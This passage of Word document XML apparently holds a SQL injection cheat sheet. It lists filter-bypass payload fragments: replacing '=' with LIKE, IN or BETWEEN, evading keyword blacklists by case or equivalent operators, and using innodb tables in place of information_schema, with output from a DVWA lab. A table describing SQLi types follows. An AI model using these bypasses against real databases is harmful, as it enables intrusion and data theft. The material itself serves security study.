          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'SQL'</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SUBSTR(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'SQL'</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FROM</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FOR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p>
    <w:p w14:paraId="12D30E0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2</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3</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4</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UNION</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FROM</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)a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN</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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)b </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN</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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)c </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN</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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD17ED"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No Equal - bypass using LIKE/NOT IN/IN/BETWEEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681BB796"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substring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(version(),</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D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>like</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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5EE33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substring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(version(),</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)not </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</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4</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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753E7F4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substring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(version(),</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D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</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4</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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5B4A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substring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(version(),</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between </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650FB624"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Blacklist using keywords - bypass using uppercase/lowercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CB76B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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695488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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D4AC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?id</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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA69F2"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Blacklist using keywords case insensitive - bypass using an equivalent operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF1E7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&amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01766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OR</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p>
    <w:p w14:paraId="1F274BD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LIKE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">,REGEXP, BETWEEN, not </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;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not </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4194EB6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X   </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not between </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091834D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WHERE</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HAVING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AF4B0A"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Information_schema.tables Alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE5D9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from</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mysql</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innodb_table_stats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B8D14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7D41864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database_name  | table_name            | last_update         | n_rows | clustered_index_size | sum_of_other_index_sizes |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C94AC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lastRenderedPageBreak/>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>----------------+-----------------------+---------------------+--------+----------------------+--------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264781C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 dvwa           | guestbook             | </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2017</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01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19</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21</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02</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57</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> |      </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> |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                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B5B7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 dvwa           | users                 | </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2017</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01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19</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21</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03</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07</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> |      </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> |                    </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                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600640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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580965A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7B8DE26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D346E3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mysql</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show tables </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dvwa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F758003"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49BCBDD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Tables_in_dvwa |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCD220"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14A605B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guestbook      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036337E"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users          |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6245D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271DED26" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B92">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Version Alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421F8C84"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mysql</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@@innodb_version;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5E894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78C472A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@@innodb_version |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E7989"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603937B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5</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6</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31</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C25A1"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68DC4E67"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6B8B91B"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mysql</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@@version;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A22C0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038005F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@@version               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6171FDD8"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6D241FE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5</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6</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31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0ubuntu0</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15</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10</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p>
    <w:p w14:paraId="1DE807D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69812B0D"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B5D862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mysql</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mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w: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D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> version();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0B712"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46AC281F"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version()               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C0D65"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t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EAB740"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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</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6</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31</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0ubuntu0</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15</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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F85111A" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF8667" w14:textId="73635D73" w:rsidR="00CC3B92" w:rsidRDefault="00CC3B92"/>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2461"/>
        <w:gridCol w:w="10769"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w14:paraId="5172500B" w14:textId="77777777" w:rsidTr="00B51AE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69FF35" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
            <w:pPr>
              <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51AE2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SQL Injection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08A31" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
            <w:pPr>
              <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51AE2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w14:paraId="409DF412" w14:textId="77777777" w:rsidTr="00B51AE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759276"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In-band SQLi (Classic SQLi)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8071E4"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In-band SQL Injection is the most common and easy-to-exploit of SQL Injection attacks. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results. The two most common types of in-band SQL Injection are Error-based SQLi and Union-based SQLi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w14:paraId="14426BDA" w14:textId="77777777" w:rsidTr="00B51AE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A931E1"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Error-based SQLi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EB4853"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Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w14:paraId="727034EE" w14:textId="77777777" w:rsidTr="00B51AE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30398D"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Union-based SQLi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1CA844"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Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w14:paraId="33CEB10A" w14:textId="77777777" w:rsidTr="00B51AE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AB94F5"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Inferential SQLi (Blind SQLi)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7E56A4"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Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection. In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band (which is why such attacks are commonly referred to as “blind SQL Injection attacks”). Instead, an attacker is able to reconstruct the database structure by sending payloads, observing the web application’s response and the resulting behavior of the database server. The two types of inferential SQL Injection are Blind-boolean-based SQLi and Blind-time-based SQLi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w14:paraId="13AEABE7" w14:textId="77777777" w:rsidTr="00B51AE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6A8FD9"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lastRenderedPageBreak/>
              <w:t>Boolean-based (content-based) Blind SQLi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1D28AF"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Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w14:paraId="07F40148" w14:textId="77777777" w:rsidTr="00B51AE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0566BB"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Time-based Blind SQLi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42D50B"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Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. epending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w14:paraId="720D7793" w14:textId="77777777" w:rsidTr="00B51AE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E1EB6B"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Out-of-band SQLi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112D8F"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Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w14:paraId="1E98E007" w14:textId="77777777" w:rsidTr="00B51AE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B13E30"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Voice Based Sql Injection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AB6D9C" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
            <w:pPr>
              <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51AE2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="24292E"/>
